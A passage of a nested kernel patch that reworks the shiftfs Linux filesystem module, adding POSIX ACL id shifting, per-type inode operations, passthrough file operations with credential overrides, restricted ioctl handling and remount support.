+ 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	inode_lock(reali);
+-	if (iop->setattr)
+-		err = iop->setattr(real, &newattr);
+-	else
+-		err = simple_setattr(real, &newattr);
+-	inode_unlock(reali);
+-	shiftfs_old_creds(oldcred, &newcred);
++	inode_lock(loweri);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = notify_change(lowerd, attr, NULL);
++	revert_creds(oldcred);
++	inode_unlock(loweri);
+ 
+-	if (err)
+-		return err;
++	shiftfs_copyattr(loweri, d_inode(dentry));
+ 
+-	/* all OK, reflect the change on our inode */
+-	setattr_copy(d_inode(dentry), attr);
+-	return 0;
++	return err;
+ }
+ 
+ static int shiftfs_getattr(const struct path *path, struct kstat *stat,
+ 			   u32 request_mask, unsigned int query_flags)
+ {
+ 	struct inode *inode = path->dentry->d_inode;
+-	struct dentry *real = path->dentry->d_fsdata;
+-	struct inode *reali = real->d_inode;
+-	const struct inode_operations *iop = reali->i_op;
+-	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
+-	int err = 0;
+-
+-	if (iop->getattr)
+-		err = iop->getattr(&newpath, stat, request_mask, query_flags);
+-	else
+-		generic_fillattr(reali, stat);
++	struct dentry *lowerd = path->dentry->d_fsdata;
++	struct inode *loweri = lowerd->d_inode;
++	struct shiftfs_super_info *info = path->dentry->d_sb->s_fs_info;
++	struct path newpath = { .mnt = info->mnt, .dentry = lowerd };
++	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
++	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
++	const struct cred *oldcred;
++	int err;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	err = vfs_getattr(&newpath, stat, request_mask, query_flags);
++	revert_creds(oldcred);
+ 
+ 	if (err)
+ 		return err;
+ 
+ 	/* transform the underlying id */
+-	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
+-	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
++	stat->uid = shift_kuid(from_ns, to_ns, stat->uid);
++	stat->gid = shift_kgid(from_ns, to_ns, stat->gid);
+ 	return 0;
+ }
+ 
+-static const struct inode_operations shiftfs_inode_ops = {
+-	.lookup		= shiftfs_lookup,
+-	.getattr	= shiftfs_getattr,
+-	.setattr	= shiftfs_setattr,
+-	.permission	= shiftfs_permission,
+-	.mkdir		= shiftfs_mkdir,
+-	.symlink	= shiftfs_symlink,
+-	.get_link	= shiftfs_get_link,
+-	.readlink	= shiftfs_readlink,
+-	.unlink		= shiftfs_unlink,
+-	.rmdir		= shiftfs_rmdir,
+-	.rename		= shiftfs_rename,
+-	.link		= shiftfs_link,
+-	.create		= shiftfs_create,
+-	.mknod		= NULL,	/* no special files currently */
+-	.listxattr	= shiftfs_listxattr,
+-};
++#ifdef CONFIG_SHIFT_FS_POSIX_ACL
+ 
+-static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
+-				       struct dentry *dentry)
++static int
++shift_acl_ids(struct user_namespace *from, struct user_namespace *to,
++	      struct posix_acl *acl)
+ {
+-	struct inode *inode;
+-
+-	inode = new_inode(sb);
+-	if (!inode)
+-		return NULL;
+-
+-	/*
+-	 * our inode is completely vestigial.  All lookups, getattr
+-	 * and permission checks are done on the underlying inode, so
+-	 * what the user sees is entirely from the underlying inode.
+-	 */
+-	mode &= S_IFMT;
++	int i;
++
++	for (i = 0; i < acl->a_count; i++) {
++		struct posix_acl_entry *e = &acl->a_entries[i];
++		switch(e->e_tag) {
++		case ACL_USER:
++			e->e_uid = shift_kuid(from, to, e->e_uid);
++			if (!uid_valid(e->e_uid))
++				return -EOVERFLOW;
++			break;
++		case ACL_GROUP:
++			e->e_gid = shift_kgid(from, to, e->e_gid);
++			if (!gid_valid(e->e_gid))
++				return -EOVERFLOW;
++			break;
++		}
++	}
++	return 0;
++}
+ 
+-	inode->i_ino = get_next_ino();
+-	inode->i_mode = mode;
+-	inode->i_flags |= S_NOATIME | S_NOCMTIME;
++static void
++shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
++		    void *value, size_t size)
++{
++	struct posix_acl_xattr_header *header = value;
++	struct posix_acl_xattr_entry *entry = (void *)(header + 1), *end;
++	int count;
++	kuid_t kuid;
++	kgid_t kgid;
+ 
+-	inode->i_op = &shiftfs_inode_ops;
++	if (!value)
++		return;
++	if (size < sizeof(struct posix_acl_xattr_header))
++		return;
++	if (header->a_version != cpu_to_le32(POSIX_ACL_XATTR_VERSION))
++		return;
+ 
+-	shiftfs_fill_inode(inode, dentry);
++	count = posix_acl_xattr_count(size);
++	if (count < 0)
++		return;
++	if (count == 0)
++		return;
+ 
+-	return inode;
++	for (end = entry + count; entry != end; entry++) {
++		switch(le16_to_cpu(entry->e_tag)) {
++		case ACL_USER:
++			kuid = make_kuid(&init_user_ns, le32_to_cpu(entry->e_id));
++			kuid = shift_kuid(from, to, kuid);
++			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
++			break;
++		case ACL_GROUP:
++			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
++			kgid = shift_kgid(from, to, kgid);
++			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
++			break;
++		default:
++			break;
++		}
++	}
+ }
+ 
+-static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
++static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
+ {
+-	struct super_block *sb = dentry->d_sb;
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct inode *loweri = inode->i_private;
++	const struct cred *oldcred;
++	struct posix_acl *lower_acl, *acl = NULL;
++	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
++	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
++	int size;
++	int err;
+ 
+-	if (ssi->mark)
+-		seq_show_option(m, "mark", NULL);
++	if (!IS_POSIXACL(loweri))
++		return NULL;
+ 
+-	return 0;
+-}
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	lower_acl = get_acl(loweri, type);
++	revert_creds(oldcred);
+ 
+-static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
+-{
+-	struct super_block *sb = dentry->d_sb;
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
+-	struct dentry *root = sb->s_root;
+-	struct dentry *realroot = root->d_fsdata;
+-	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
+-	int err;
++	if (lower_acl && !IS_ERR(lower_acl)) {
++		/* XXX: export posix_acl_clone? */
++		size = sizeof(struct posix_acl) +
++		       lower_acl->a_count * sizeof(struct posix_acl_entry);
++		acl = kmemdup(lower_acl, size, GFP_KERNEL);
++		posix_acl_release(lower_acl);
+ 
+-	err = vfs_statfs(&realpath, buf);
+-	if (err)
+-		return err;
++		if (!acl)
++			return ERR_PTR(-ENOMEM);
+ 
+-	buf->f_type = sb->s_magic;
++		refcount_set(&acl->a_refcount, 1);
+ 
+-	return 0;
++		err = shift_acl_ids(from_ns, to_ns, acl);
++		if (err) {
++			kfree(acl);
++			return ERR_PTR(err);
++		}
++	}
++
++	return acl;
+ }
+ 
+-static void shiftfs_put_super(struct super_block *sb)
++static int
++shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
++			   struct dentry *dentry, struct inode *inode,
++			   const char *name, void *buffer, size_t size)
+ {
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct inode *loweri = inode->i_private;
++	int ret;
++
++	ret = shiftfs_xattr_get(NULL, dentry, inode, handler->name,
++				buffer, size);
++	if (ret < 0)
++		return ret;
+ 
+-	mntput(ssi->mnt);
+-	put_user_ns(ssi->userns);
+-	kfree(ssi);
++	inode_lock(loweri);
++	shift_acl_xattr_ids(loweri->i_sb->s_user_ns, inode->i_sb->s_user_ns,
++			    buffer, size);
++	inode_unlock(loweri);
++	return ret;
+ }
+ 
+-static const struct xattr_handler shiftfs_xattr_handler = {
+-	.prefix = "",
+-	.get    = shiftfs_xattr_get,
+-	.set    = shiftfs_xattr_set,
+-};
++static int
++shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
++			    struct dentry *dentry, struct inode *inode,
++			    const char *name, const void *value,
++			    size_t size, int flags)
++{
++	struct inode *loweri = inode->i_private;
++	int err;
+ 
+-const struct xattr_handler *shiftfs_xattr_handlers[] = {
+-	&shiftfs_xattr_handler,
+-	NULL
+-};
++	if (!IS_POSIXACL(loweri) || !loweri->i_op->set_acl)
++		return -EOPNOTSUPP;
++	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
++		return value ? -EACCES : 0;
++	if (!inode_owner_or_capable(inode))
++		return -EPERM;
++
++	if (value) {
++		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
++				    loweri->i_sb->s_user_ns,
++				    (void *)value, size);
++		err = shiftfs_setxattr(dentry, inode, handler->name, value,
++				       size, flags);
++	} else {
++		err = shiftfs_removexattr(dentry, handler->name);
++	}
+ 
+-static const struct super_operations shiftfs_super_ops = {
+-	.put_super	= shiftfs_put_super,
+-	.show_options	= shiftfs_show_options,
+-	.statfs		= shiftfs_statfs,
++	if (!err)
++		shiftfs_copyattr(loweri, inode);
++
++	return err;
++}
++
++static const struct xattr_handler
++shiftfs_posix_acl_access_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_ACCESS,
++	.flags = ACL_TYPE_ACCESS,
++	.get = shiftfs_posix_acl_xattr_get,
++	.set = shiftfs_posix_acl_xattr_set,
+ };
+ 
+-struct shiftfs_data {
+-	void *data;
+-	const char *path;
++static const struct xattr_handler
++shiftfs_posix_acl_default_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_DEFAULT,
++	.flags = ACL_TYPE_DEFAULT,
++	.get = shiftfs_posix_acl_xattr_get,
++	.set = shiftfs_posix_acl_xattr_set,
+ };
+ 
+-static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+-			      int silent)
+-{
+-	struct shiftfs_data *data = raw_data;
+-	char *name = kstrdup(data->path, GFP_KERNEL);
+-	int err = -ENOMEM;
+-	struct shiftfs_super_info *ssi = NULL;
+-	struct path path;
+-	struct dentry *dentry;
++#else /* !CONFIG_SHIFT_FS_POSIX_ACL */
+ 
+-	if (!name)
+-		goto out;
++#define shiftfs_get_acl NULL
+ 
+-	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
+-	if (!ssi)
+-		goto out;
++#endif /* CONFIG_SHIFT_FS_POSIX_ACL */
+ 
+-	err = -EPERM;
+-	err = shiftfs_parse_options(ssi, data->data);
++static const struct inode_operations shiftfs_dir_inode_operations = {
++	.lookup		= shiftfs_lookup,
++	.mkdir		= shiftfs_mkdir,
++	.symlink	= shiftfs_symlink,
++	.unlink		= shiftfs_unlink,
++	.rmdir		= shiftfs_rmdir,
++	.rename		= shiftfs_rename,
++	.link		= shiftfs_link,
++	.setattr	= shiftfs_setattr,
++	.create		= shiftfs_create,
++	.mknod		= shiftfs_mknod,
++	.permission	= shiftfs_permission,
++	.getattr	= shiftfs_getattr,
++	.listxattr	= shiftfs_listxattr,
++	.get_acl	= shiftfs_get_acl,
++};
++
++static const struct inode_operations shiftfs_file_inode_operations = {
++	.fiemap		= shiftfs_fiemap,
++	.getattr	= shiftfs_getattr,
++	.get_acl	= shiftfs_get_acl,
++	.listxattr	= shiftfs_listxattr,
++	.permission	= shiftfs_permission,
++	.setattr	= shiftfs_setattr,
++	.tmpfile	= shiftfs_tmpfile,
++};
++
++static const struct inode_operations shiftfs_special_inode_operations = {
++	.getattr	= shiftfs_getattr,
++	.get_acl	= shiftfs_get_acl,
++	.listxattr	= shiftfs_listxattr,
++	.permission	= shiftfs_permission,
++	.setattr	= shiftfs_setattr,
++};
++
++static const struct inode_operations shiftfs_symlink_inode_operations = {
++	.getattr	= shiftfs_getattr,
++	.get_link	= shiftfs_get_link,
++	.listxattr	= shiftfs_listxattr,
++	.setattr	= shiftfs_setattr,
++};
++
++static struct file *shiftfs_open_realfile(const struct file *file,
++					  struct path *realpath)
++{
++	struct file *lowerf;
++	const struct cred *oldcred;
++	struct inode *inode = file_inode(file);
++	struct inode *loweri = realpath->dentry->d_inode;
++	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	/* XXX: open_with_fake_path() is not guaranteed to stay around; if
++	 * it is removed, use dentry_open() */
++	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
++	revert_creds(oldcred);
++
++	return lowerf;
++}
++
++#define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
++
++static int shiftfs_change_flags(struct file *file, unsigned int flags)
++{
++	struct inode *inode = file_inode(file);
++	int err;
++
++	/* if a flag changed that cannot be changed, something's amiss */
++	if (WARN_ON((file->f_flags ^ flags) & ~SHIFTFS_SETFL_MASK))
++		return -EIO;
++
++	flags &= SHIFTFS_SETFL_MASK;
++
++	if (((flags ^ file->f_flags) & O_APPEND) && IS_APPEND(inode))
++		return -EPERM;
++
++	if (flags & O_DIRECT) {
++		if (!file->f_mapping->a_ops ||
++		    !file->f_mapping->a_ops->direct_IO)
++			return -EINVAL;
++	}
++
++	if (file->f_op->check_flags) {
++		err = file->f_op->check_flags(flags);
++		if (err)
++			return err;
++	}
++
++	spin_lock(&file->f_lock);
++	file->f_flags = (file->f_flags & ~SHIFTFS_SETFL_MASK) | flags;
++	spin_unlock(&file->f_lock);
++
++	return 0;
++}
++
++static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++
++	lowerfd->flags = 0;
++	lowerfd->file = realfile;
++
++	/* Did the flags change since open? */
++	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
++		return shiftfs_change_flags(lowerfd->file, file->f_flags);
++
++	return 0;
++}
++
++static int shiftfs_open(struct inode *inode, struct file *file)
++{
++	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
++	struct shiftfs_file_info *file_info;
++	struct file *realfile;
++	struct path *realpath;
++
++	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
++	if (!file_info)
++		return -ENOMEM;
++
++	realpath = &file_info->realpath;
++	realpath->mnt = ssi->mnt;
++	realpath->dentry = file->f_path.dentry->d_fsdata;
++
++	realfile = shiftfs_open_realfile(file, realpath);
++	if (IS_ERR(realfile)) {
++		kmem_cache_free(shiftfs_file_info_cache, file_info);
++		return PTR_ERR(realfile);
++	}
++
++	file->private_data = file_info;
++	file_info->realfile = realfile;
++	return 0;
++}
++
++static int shiftfs_release(struct inode *inode, struct file *file)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++
++	if (file_info) {
++		if (file_info->realfile)
++			fput(file_info->realfile);
++
++		kmem_cache_free(shiftfs_file_info_cache, file_info);
++	}
++
++	return 0;
++}
++
++static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct inode *realinode = file_inode(file)->i_private;
++
++	return generic_file_llseek_size(file, offset, whence,
++					realinode->i_sb->s_maxbytes,
++					i_size_read(realinode));
++}
++
++/* XXX: Need to figure out what to do about atime updates, maybe other
++ * timestamps too ... ref. ovl_file_accessed() */
++
++static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
++{
++	int ifl = iocb->ki_flags;
++	rwf_t flags = 0;
++
++	if (ifl & IOCB_NOWAIT)
++		flags |= RWF_NOWAIT;
++	if (ifl & IOCB_HIPRI)
++		flags |= RWF_HIPRI;
++	if (ifl & IOCB_DSYNC)
++		flags |= RWF_DSYNC;
++	if (ifl & IOCB_SYNC)
++		flags |= RWF_SYNC;
++
++	return flags;
++}
++
++static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
++{
++	struct file *file = iocb->ki_filp;
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	ssize_t ret;
++
++	if (!iov_iter_count(iter))
++		return 0;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_iter_read(lowerfd.file, iter, &iocb->ki_pos,
++			    shiftfs_iocb_to_rwf(iocb));
++	revert_creds(oldcred);
++
++	shiftfs_file_accessed(file);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static ssize_t shiftfs_write_iter(struct kiocb *iocb, struct iov_iter *iter)
++{
++	struct file *file = iocb->ki_filp;
++	struct inode *inode = file_inode(file);
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	ssize_t ret;
++
++	if (!iov_iter_count(iter))
++		return 0;
++
++	inode_lock(inode);
++	/* Update mode */
++	shiftfs_copyattr(inode->i_private, inode);
++	ret = file_remove_privs(file);
++	if (ret)
++		goto out_unlock;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		goto out_unlock;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	file_start_write(lowerfd.file);
++	ret = vfs_iter_write(lowerfd.file, iter, &iocb->ki_pos,
++			     shiftfs_iocb_to_rwf(iocb));
++	file_end_write(lowerfd.file);
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(inode->i_private, inode);
++
++	fdput(lowerfd);
++
++out_unlock:
++	inode_unlock(inode);
++	return ret;
++}
++
++static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
++			 int datasync)
++{
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fsync_range(lowerfd.file, start, end, datasync);
++	revert_creds(oldcred);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++	const struct cred *oldcred;
++	int ret;
++
++	if (!realfile->f_op->mmap)
++		return -ENODEV;
++
++	if (WARN_ON(file != vma->vm_file))
++		return -EIO;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	vma->vm_file = get_file(realfile);
++	ret = call_mmap(vma->vm_file, vma);
++	revert_creds(oldcred);
++
++	shiftfs_file_accessed(file);
++
++	if (ret)
++		fput(realfile); /* Drop refcount from new vm_file value */
++	else
++		fput(file); /* Drop refcount from previous vm_file value */
++
++	return ret;
++}
++
++static long shiftfs_fallocate(struct file *file, int mode, loff_t offset,
++			      loff_t len)
++{
++	struct inode *inode = file_inode(file);
++	struct inode *loweri = inode->i_private;
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fallocate(lowerfd.file, mode, offset, len);
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(loweri, inode);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
++			   int advice)
++{
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fadvise(lowerfd.file, offset, len, advice);
++	revert_creds(oldcred);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_override_ioctl_creds(const struct super_block *sb,
++					const struct cred **oldcred,
++					struct cred **newcred)
++{
++	kuid_t fsuid = current_fsuid();
++	kgid_t fsgid = current_fsgid();
++
++	*oldcred = shiftfs_override_creds(sb);
++
++	*newcred = prepare_creds();
++	if (!*newcred) {
++		revert_creds(*oldcred);
++		return -ENOMEM;
++	}
++
++	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
++	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++
++	/* clear all caps to prevent bypassing capable() checks */
++	cap_clear((*newcred)->cap_bset);
++	cap_clear((*newcred)->cap_effective);
++	cap_clear((*newcred)->cap_inheritable);
++	cap_clear((*newcred)->cap_permitted);
++
++	put_cred(override_creds(*newcred));
++	return 0;
++}
++
++static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
++					      struct cred *newcred)
++{
++	return shiftfs_revert_object_creds(oldcred, newcred);
++}
++
++static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
++			       unsigned long arg)
++{
++	long ret = 0;
++	struct fd lowerfd;
++	struct cred *newcred;
++	const struct cred *oldcred;
++	struct super_block *sb = file->f_path.dentry->d_sb;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
++	if (ret)
++		goto out_fdput;
++
++	ret = vfs_ioctl(lowerfd.file, cmd, arg);
++
++	shiftfs_revert_ioctl_creds(oldcred, newcred);
++
++	shiftfs_copyattr(file_inode(lowerfd.file), file_inode(file));
++	shiftfs_copyflags(file_inode(lowerfd.file), file_inode(file));
++
++out_fdput:
++	fdput(lowerfd);
++
++	return ret;
++}
++
++static long shiftfs_ioctl(struct file *file, unsigned int cmd,
++			  unsigned long arg)
++{
++	switch (cmd) {
++	case FS_IOC_GETVERSION:
++		/* fall through */
++	case FS_IOC_GETFLAGS:
++		/* fall through */
++	case FS_IOC_SETFLAGS:
++		break;
++	default:
++		return -ENOTTY;
++	}
++
++	return shiftfs_real_ioctl(file, cmd, arg);
++}
++
++static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
++				 unsigned long arg)
++{
++	switch (cmd) {
++	case FS_IOC32_GETVERSION:
++		/* fall through */
++	case FS_IOC32_GETFLAGS:
++		/* fall through */
++	case FS_IOC32_SETFLAGS:
++		break;
++	default:
++		return -ENOIOCTLCMD;
++	}
++
++	return shiftfs_real_ioctl(file, cmd, arg);
++}
++
++enum shiftfs_copyop {
++	SHIFTFS_COPY,
++	SHIFTFS_CLONE,
++	SHIFTFS_DEDUPE,
++};
++
++static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in,
++				struct file *file_out, loff_t pos_out, u64 len,
++				unsigned int flags, enum shiftfs_copyop op)
++{
++	ssize_t ret;
++	struct fd real_in, real_out;
++	const struct cred *oldcred;
++	struct inode *inode_out = file_inode(file_out);
++	struct inode *loweri = inode_out->i_private;
++
++	ret = shiftfs_real_fdget(file_out, &real_out);
++	if (ret)
++		return ret;
++
++	ret = shiftfs_real_fdget(file_in, &real_in);
++	if (ret) {
++		fdput(real_out);
++		return ret;
++	}
++
++	oldcred = shiftfs_override_creds(inode_out->i_sb);
++	switch (op) {
++	case SHIFTFS_COPY:
++		ret = vfs_copy_file_range(real_in.file, pos_in, real_out.file,
++					  pos_out, len, flags);
++		break;
++
++	case SHIFTFS_CLONE:
++		ret = vfs_clone_file_range(real_in.file, pos_in, real_out.file,
++					   pos_out, len, flags);
++		break;
++
++	case SHIFTFS_DEDUPE:
++		ret = vfs_dedupe_file_range_one(real_in.file, pos_in,
++						real_out.file, pos_out, len,
++						flags);
++		break;
++	}
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(loweri, inode_out);
++
++	fdput(real_in);
++	fdput(real_out);
++
++	return ret;
++}
++
++static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in,
++				       struct file *file_out, loff_t pos_out,
++				       size_t len, unsigned int flags)
++{
++	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, flags,
++				SHIFTFS_COPY);
++}
++
++static loff_t shiftfs_remap_file_range(struct file *file_in, loff_t pos_in,
++				       struct file *file_out, loff_t pos_out,
++				       loff_t len, unsigned int remap_flags)
++{
++	enum shiftfs_copyop op;
++
++	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
++		return -EINVAL;
++
++	if (remap_flags & REMAP_FILE_DEDUP)
++		op = SHIFTFS_DEDUPE;
++	else
++		op = SHIFTFS_CLONE;
++
++	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len,
++				remap_flags, op);
++}
++
++static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
++{
++	const struct cred *oldcred;
++	int err = -ENOTDIR;
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	err = iterate_dir(realfile, ctx);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++const struct file_operations shiftfs_file_operations = {
++	.open			= shiftfs_open,
++	.release		= shiftfs_release,
++	.llseek			= shiftfs_llseek,
++	.read_iter		= shiftfs_read_iter,
++	.write_iter		= shiftfs_write_iter,
++	.fsync			= shiftfs_fsync,
++	.mmap			= shiftfs_mmap,
++	.fallocate		= shiftfs_fallocate,
++	.fadvise		= shiftfs_fadvise,
++	.unlocked_ioctl		= shiftfs_ioctl,
++	.compat_ioctl		= shiftfs_compat_ioctl,
++	.copy_file_range	= shiftfs_copy_file_range,
++	.remap_file_range	= shiftfs_remap_file_range,
++};
++
++const struct file_operations shiftfs_dir_operations = {
++	.compat_ioctl		= shiftfs_compat_ioctl,
++	.fsync			= shiftfs_fsync,
++	.iterate_shared		= shiftfs_iterate_shared,
++	.llseek			= shiftfs_llseek,
++	.open			= shiftfs_open,
++	.read			= generic_read_dir,
++	.release		= shiftfs_release,
++	.unlocked_ioctl		= shiftfs_ioctl,
++};
++
++static const struct address_space_operations shiftfs_aops = {
++	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO */
++	.direct_IO	= noop_direct_IO,
++};
++
++static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
++			       umode_t mode, dev_t dev, struct dentry *dentry)
++{
++	struct inode *loweri;
++
++	inode->i_ino = ino;
++	inode->i_flags |= S_NOCMTIME;
++
++	mode &= S_IFMT;
++	inode->i_mode = mode;
++	switch (mode & S_IFMT) {
++	case S_IFDIR:
++		inode->i_op = &shiftfs_dir_inode_operations;
++		inode->i_fop = &shiftfs_dir_operations;
++		break;
++	case S_IFLNK:
++		inode->i_op = &shiftfs_symlink_inode_operations;
++		break;
++	case S_IFREG:
++		inode->i_op = &shiftfs_file_inode_operations;
++		inode->i_fop = &shiftfs_file_operations;
++		inode->i_mapping->a_ops = &shiftfs_aops;
++		break;
++	default:
++		inode->i_op = &shiftfs_special_inode_operations;
++		init_special_inode(inode, mode, dev);
++		break;
++	}
++
++	if (!dentry)
++		return;
++
++	loweri = dentry->d_inode;
++	if (!loweri->i_op->get_link)
++		inode->i_opflags |= IOP_NOFOLLOW;
++
++	shiftfs_copyattr(loweri, inode);
++	shiftfs_copyflags(loweri, inode);
++	set_nlink(inode, loweri->i_nlink);
++}
++
++static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++
++	if (sbinfo->mark)
++		seq_show_option(m, "mark", NULL);
++
++	if (sbinfo->passthrough)
++		seq_printf(m, ",passthrough=%u", sbinfo->passthrough);
++
++	return 0;
++}
++
++static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++	struct dentry *root = sb->s_root;
++	struct dentry *realroot = root->d_fsdata;
++	struct path realpath = { .mnt = sbinfo->mnt, .dentry = realroot };
++	int err;
++
++	err = vfs_statfs(&realpath, buf);
+ 	if (err)
+-		goto out;
++		return err;
+ 
+-	/* to mark a mount point, must be real root */
+-	if (ssi->mark && !capable(CAP_SYS_ADMIN))
+-		goto out;
++	if (!shiftfs_passthrough_statfs(sbinfo))
++		buf->f_type = sb->s_magic;
+ 
+-	/* else to mount a mark, must be userns admin */
+-	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
+-		goto out;
++	return 0;
++}
+ 
+-	err = kern_path(name, LOOKUP_FOLLOW, &path);
++static void shiftfs_evict_inode(struct inode *inode)
++{
++	struct inode *loweri = inode->i_private;
++
++	clear_inode(inode);
++
++	if (loweri)
++		iput(loweri);
++}
++
++static void shiftfs_put_super(struct super_block *sb)
++{
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++
++	if (sbinfo) {
++		mntput(sbinfo->mnt);
++		put_cred(sbinfo->creator_cred);
++		kfree(sbinfo);
++	}
++}
++
++static const struct xattr_handler shiftfs_xattr_handler = {
++	.prefix = "",
++	.get    = shiftfs_xattr_get,
++	.set    = shiftfs_xattr_set,
++};
++
++const struct xattr_handler *shiftfs_xattr_handlers[] = {
++#ifdef CONFIG_SHIFT_FS_POSIX_ACL
++	&shiftfs_posix_acl_access_xattr_handler,
++	&shiftfs_posix_acl_default_xattr_handler,
++#endif
++	&shiftfs_xattr_handler,
++	NULL
++};
++
++static inline bool passthrough_is_subset(int old_flags, int new_flags)
++{
++	if ((new_flags & old_flags) != new_flags)
++		return false;
++
++	return true;
++}
++
++static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
++{
++	int err;
++	struct shiftfs_super_info new = {};
++	struct shiftfs_super_info *info = sb->s_fs_info;
++
++	err = shiftfs_parse_mount_options(&new, data);
+ 	if (err)
+-		goto out;
++		return err;
++
++	/* Mark mount option cannot be changed. */
